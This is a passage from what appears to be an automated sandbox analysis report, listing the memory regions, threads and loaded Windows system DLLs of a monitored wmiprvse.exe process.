0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1124 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1125 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1126 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1127 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1550 start_va = 0x1a90000 end_va = 0x1acffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001a90000" filename = "" Region: id = 1551 start_va = 0x7ffa4000 end_va = 0x7ffa4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffa4000" filename = "" Region: id = 1582 start_va = 0x1840000 end_va = 0x187ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001840000" filename = "" Thread: id = 27 os_tid = 0x4d0 Thread: id = 28 os_tid = 0xf5c Thread: id = 29 os_tid = 0xf58 Thread: id = 30 os_tid = 0xe84 Thread: id = 31 os_tid = 0x81c Thread: id = 32 os_tid = 0x810 Thread: id = 33 os_tid = 0x804 Thread: id = 34 os_tid = 0x3b8 Thread: id = 35 os_tid = 0x150 Thread: id = 36 os_tid = 0x5ac Thread: id = 37 os_tid = 0x398 Thread: id = 38 os_tid = 0x148 Thread: id = 39 os_tid = 0x2fc Thread: id = 40 os_tid = 0x228 Thread: id = 41 os_tid = 0x110 Thread: id = 42 os_tid = 0x710 Thread: id = 43 os_tid = 0x37c Thread: id = 44 os_tid = 0x4a8 Thread: id = 45 os_tid = 0x454 Thread: id = 46 os_tid = 0x11c Thread: id = 47 os_tid = 0xf4 Thread: id = 48 os_tid = 0x7f4 Thread: id = 49 os_tid = 0x794 Thread: id = 50 os_tid = 0x78c Thread: id = 51 os_tid = 0x770 Thread: id = 52 os_tid = 0x754 Thread: id = 53 os_tid = 0x73c Thread: id = 54 os_tid = 0x730 Thread: id = 55 os_tid = 0x510 Thread: id = 56 os_tid = 0x508 Thread: id = 57 os_tid = 0x504 Thread: id = 58 os_tid = 0x4e4 Thread: id = 59 os_tid = 0x4d8 Thread: id = 60 os_tid = 0x450 Thread: id = 61 os_tid = 0x3f4 Thread: id = 62 os_tid = 0x3e4 Thread: id = 63 os_tid = 0x3d8 Thread: id = 64 os_tid = 0x33c Thread: id = 65 os_tid = 0x334 Thread: id = 83 os_tid = 0x8dc Thread: id = 84 os_tid = 0x8e0 Thread: id = 85 os_tid = 0x8e4 Thread: id = 102 os_tid = 0xb10 Thread: id = 117 os_tid = 0xddc Process: id = "5" image_name = "wmiprvse.exe" filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe" page_root = "0x7ef47c40" os_pid = "0xd4c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:000442f9" [0xc000000f] Region: id = 1128 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1129 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1130 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1131 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1132 start_va = 0x50000 end_va = 0xb6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1133 start_va = 0xc0000 end_va = 0x119fff monitored = 0 entry_point = 0xfa810 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 1134 start_va = 0x120000 end_va = 0x1e7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 1135 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1136 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1137 start_va = 0x210000 end_va = 0x24ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 1138 start_va = 0x250000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 1139 start_va = 0x360000 end_va = 0x3dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 1140 start_va = 0x3e0000 end_va = 0x3e4fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\System32\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\user32.dll.mui") Region: id = 1141 start_va = 0x3f0000 end_va = 0x3f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 1142 start_va = 0x400000 end_va = 0x400fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 1143 start_va = 0x410000 end_va = 0x410fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 1144 start_va = 0x420000 end_va = 0x42cfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\System32\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\setupapi.dll.mui") Region: id = 1145 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 1146 start_va = 0x530000 end_va = 0x7fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1147 start_va = 0x800000 end_va = 0x801fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000800000" filename = "" Region: id = 1148 start_va = 0x820000 end_va = 0x85ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 1149 start_va = 0x860000 end_va = 0x89ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000860000" filename = "" Region: id = 1150 start_va = 0x8a0000 end_va = 0x8a2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cimwin32.dll.mui" filename = "\\Windows\\System32\\wbem\\en-US\\cimwin32.dll.mui" (normalized: "c:\\windows\\system32\\wbem\\en-us\\cimwin32.dll.mui") Region: id = 1151 start_va = 0x940000 end_va = 0x97ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000940000" filename = "" Region: id = 1152 start_va = 0x980000 end_va = 0x9bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 1153 start_va = 0x9c0000 end_va = 0xabffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 1154 start_va = 0xb90000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b90000" filename = "" Region: id = 1155 start_va = 0xbd0000 end_va = 0xc0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bd0000" filename = "" Region: id = 1156 start_va = 0xc40000 end_va = 0xc7ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000c40000" filename = "" Region: id = 1157 start_va = 0xcd0000 end_va = 0xd0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000cd0000" filename = "" Region: id = 1158 start_va = 0xd10000 end_va = 0xe0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000d10000" filename = "" Region: id = 1159 start_va = 0x69f80000 end_va = 0x69f82fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "security.dll" filename = "\\Windows\\System32\\security.dll" (normalized: "c:\\windows\\system32\\security.dll") Region: id = 1160 start_va = 0x69f90000 end_va = 0x69f96fff monitored = 0 entry_point = 0x69f91230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 1161 start_va = 0x6a000000 end_va = 0x6a007fff monitored = 0 entry_point = 0x6a0011fc region_type = mapped_file name = "schedcli.dll" filename = "\\Windows\\System32\\schedcli.dll" (normalized: "c:\\windows\\system32\\schedcli.dll") Region: id = 1162 start_va = 0x6a010000 end_va = 0x6a159fff monitored = 0 entry_point = 0x6a0308ae region_type = mapped_file name = "cimwin32.dll" filename = "\\Windows\\System32\\wbem\\cimwin32.dll" (normalized: "c:\\windows\\system32\\wbem\\cimwin32.dll") Region: id = 1163 start_va = 0x6a790000 end_va = 0x6a7b9fff monitored = 0 entry_point = 0x6a7a1d3d region_type = mapped_file name = "wmipcima.dll" filename = "\\Windows\\System32\\wbem\\wmipcima.dll" (normalized: "c:\\windows\\system32\\wbem\\wmipcima.dll") Region: id = 1164 start_va = 0x6aba0000 end_va = 0x6abacfff monitored = 0 entry_point = 0x6aba12d0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 1165 start_va = 0x6b110000 end_va = 0x6b112fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wmi.dll" filename = "\\Windows\\System32\\wmi.dll" (normalized: "c:\\windows\\system32\\wmi.dll") Region: id = 1166 start_va = 0x70940000 end_va = 0x70974fff monitored = 0 entry_point = 0x7095ee80 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 1167 start_va = 0x70b00000 end_va = 0x70b0afff monitored = 0 entry_point = 0x70b01200 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 1168 start_va = 0x734a0000 end_va = 0x734aefff monitored = 0 entry_point = 0x734a7f10 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 1169 start_va = 0x735b0000 end_va = 0x735c9fff monitored = 0 entry_point = 0x735c03d0 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 1170 start_va = 0x73620000 end_va = 0x7362efff monitored = 0 entry_point = 0x736293d0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 1171 start_va = 0x73810000 end_va = 0x7381afff monitored = 0 entry_point = 0x738152a0 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 1172 start_va = 0x73820000 end_va = 0x73837fff monitored = 0 entry_point = 0x73821335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 1173 start_va = 0x73840000 end_va = 0x738e5fff monitored = 0 entry_point = 0x738aa2f0 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 1174 start_va = 0x73ae0000 end_va = 0x73b40fff monitored = 0 entry_point = 0x73b1bf40 region_type = mapped_file name = "wbemcomn2.dll" filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll") Region: id = 1175 start_va = 0x73bd0000 end_va = 0x73bd8fff monitored = 0 entry_point = 0x73bd1229 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1176 start_va = 0x73fa0000 end_va = 0x73faefff monitored = 0 entry_point = 0x73fa125e region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 1177 start_va = 0x73fb0000 end_va = 0x73fbefff monitored = 0 entry_point = 0x73fb12a1 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 1178 start_va = 0x73fc0000 end_va = 0x73fc8fff monitored = 0 entry_point = 0x73fc15a6 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1179 start_va = 0x73fd0000 end_va = 0x73fe0fff monitored = 0 entry_point = 0x73fd1300 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 1180 start_va = 0x740d0000 end_va = 0x740dcfff monitored = 0 entry_point = 0x740d11e0 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1181 start_va = 0x74b60000 end_va = 0x74b84fff monitored = 0 entry_point = 0x74b62b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1182 start_va = 0x74c10000 end_va = 0x74c30fff monitored = 0 entry_point = 0x74c1145e region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1183 start_va = 0x74fa0000 end_va = 0x74fa7fff monitored = 0 entry_point = 0x74fa34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll") Region: id = 1184 start_va = 0x75070000 end_va = 0x750aafff monitored = 0 entry_point = 0x7507128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1185 start_va = 0x750e0000 end_va = 0x7511efff monitored = 0 entry_point = 0x750e2351 region_type = mapped_file name = "schannel.dll" filename = "\\Windows\\System32\\schannel.dll" (normalized: "c:\\windows\\system32\\schannel.dll") Region: id = 1186 start_va = 0x75120000 end_va = 0x75141fff monitored = 0 entry_point = 0x751253e9 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1187 start_va = 0x752d0000 end_va = 0x752e6fff monitored = 0 entry_point = 0x752d3573 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1188 start_va = 0x75400000 end_va = 0x75416fff monitored = 0 entry_point = 0x75403574 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1189 start_va = 0x756b0000 end_va = 0x756c8fff monitored = 0 entry_point = 0x756b1319 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1190 start_va = 0x75720000 end_va = 0x75727fff monitored = 0 entry_point = 0x757210e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 1191 start_va = 0x75740000 end_va = 0x7575afff monitored = 0 entry_point = 0x757493b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1192 start_va = 0x75760000 end_va = 0x7576bfff monitored = 0 entry_point = 0x757610e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1193 start_va = 0x757d0000 end_va = 0x757f8fff monitored = 0 entry_point = 0x757d6b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1194 start_va = 0x75800000 end_va = 0x7580dfff monitored = 0 entry_point = 0x75801235 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1195 start_va = 0x75880000 end_va = 0x7588bfff monitored = 0 entry_point = 0x7588238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1196 start_va = 0x75920000 end_va = 0x7594efff monitored = 0 entry_point = 0x75922a35 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1197 start_va = 0x75950000 end_va = 0x75a70fff monitored = 0 entry_point = 0x7595158e region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1198 start_va = 0x75a80000 end_va = 0x75aa6fff monitored = 0 entry_point = 0x75a858b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1199 start_va = 0x75ab0000 end_va = 0x75afafff monitored = 0 entry_point = 0x75ab7e10 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1200 start_va = 0x75b00000 end_va = 0x75b11fff monitored = 0 entry_point = 0x75b01441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1201 start_va = 0x75ba0000 end_va = 0x75bedfff monitored = 0 entry_point = 0x75ba9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1202 start_va = 0x75c50000 end_va = 0x75decfff monitored = 0 entry_point = 0x75c517e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1203 start_va = 0x75df0000 end_va = 0x75e90fff monitored = 0 entry_point = 0x75e22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1204 start_va = 0x75ea0000 end_va = 0x75ebefff monitored = 0 entry_point = 0x75ea1355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1205 start_va = 0x75ec0000 end_va = 0x75f8bfff monitored = 0 entry_point = 0x75ec168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1206 start_va = 0x75f90000 end_va = 0x75f95fff monitored = 0 entry_point = 0x75f91782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1207 start_va = 0x76000000 end_va = 0x76034fff monitored = 0 entry_point = 0x7600145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1208 start_va = 0x76040000 end_va = 0x76113fff monitored = 0 entry_point = 0x7608ce6f region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1209 start_va = 0x76130000 end_va = 0x761cffff monitored = 0 entry_point = 0x761449e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1210 start_va = 0x761d0000 end_va = 0x7626cfff monitored = 0 entry_point = 0x76203fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1211 start_va = 0x76270000 end_va = 0x7631bfff monitored = 0 entry_point = 0x7627a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1212 start_va = 0x76460000 end_va = 0x76478fff monitored = 0 entry_point = 0x76464975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1213 start_va = 0x76480000 end_va = 0x765dbfff monitored = 0 entry_point = 0x764cba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1214 start_va = 0x766e0000 end_va = 0x767a8fff monitored = 0 entry_point = 0x766fd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1215 start_va = 0x767b0000 end_va = 0x767b9fff monitored = 0 entry_point = 0x767b136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1216 start_va = 0x769c0000 end_va = 0x76a4efff monitored = 0 entry_point = 0x769c3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1217 start_va = 0x776d0000 end_va = 0x7780bfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1218 start_va = 0x77810000 end_va = 0x77892fff monitored = 0 entry_point = 0x778123d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1219 start_va = 0x778b0000 end_va = 0x778f4fff monitored = 0 entry_point = 0x778b11e1 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1220 start_va = 0x77910000 end_va = 0x77910fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1221 start_va = 0x7f6f0000 end_va = 0x7f7effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1222 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1223 start_va = 0x7ffd6000 end_va = 0x7ffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1224 start_va = 0x7ffd7000 end_va = 0x7ffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 1225 start_va = 0x7ffd8000 end_va = 0x7ffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 1226 start_va = 0x7ffd9000 end_va = 0x7ffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 1227 start_va = 0x7ffda000 end_va = 0x7ffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 1228 start_va = 0x7ffdb000 end_va = 0x7ffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 1229 start_va = 0x7ffdc000 end_va = 0x7ffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 1230 start_va = 0x7ffdd000 end_va = 0x7ffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1231 start_va = 0x7ffde000 end_va = 0x7ffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1232 start_va = 0x7ffdf000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1233 start_va = 0x6a770000 end_va = 0x6a78ffff monitored = 0 entry_point = 0x6a783f98 region_type = mapped_file name = "vsswmi.dll" filename = "\\Windows\\System32\\wbem\\vsswmi.dll" (normalized: "c:\\windows\\system32\\wbem\\vsswmi.dll") Region: id = 1234 start_va = 0x6dc30000 end_va = 0x6dd45fff monitored = 0 entry_point = 0x6dc31590 region_type = mapped_file name = "vssapi.dll" filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll") Region: id = 1235 start_va = 0x73bf0000 end_va = 0x73c03fff monitored = 0 entry_point = 0x73bf1da9 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1236 start_va = 0x6dc20000 end_va = 0x6dc2ffff monitored = 0 entry_point = 0x6dc21270 region_type = mapped_file name = "vsstrace.dll" filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll") Region: id = 1237 start_va = 0x810000 end_va = 0x810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1238 start_va = 0x8b0000 end_va = 0x8b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1239 start_va = 0x810000 end_va = 0x810fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1240 start_va = 0x8b0000 end_va = 0x8b6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1241 start_va = 0x6c710000 end_va = 0x6c719fff monitored = 0 entry_point = 0x6c714aac region_type = mapped_file name = "vss_ps.dll" filename = "\\Windows\\System32\\vss_ps.dll" (normalized: "c:\\windows\\system32\\vss_ps.dll") Region: id = 1387 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1388 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1389 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1390 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\tzres.dll.mui") Region: id = 1391 start_va = 0x800000 end_va = 0x800fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\System32\\tzres.dll" (normalized: "c:\\windows\\system32\\tzres.dll") Region: id = 1392 start_va = 0x810000 end_va = 0x816fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll.mui" filename = "\\Windows\\System32\\en-US\\tzres.dll.mui" 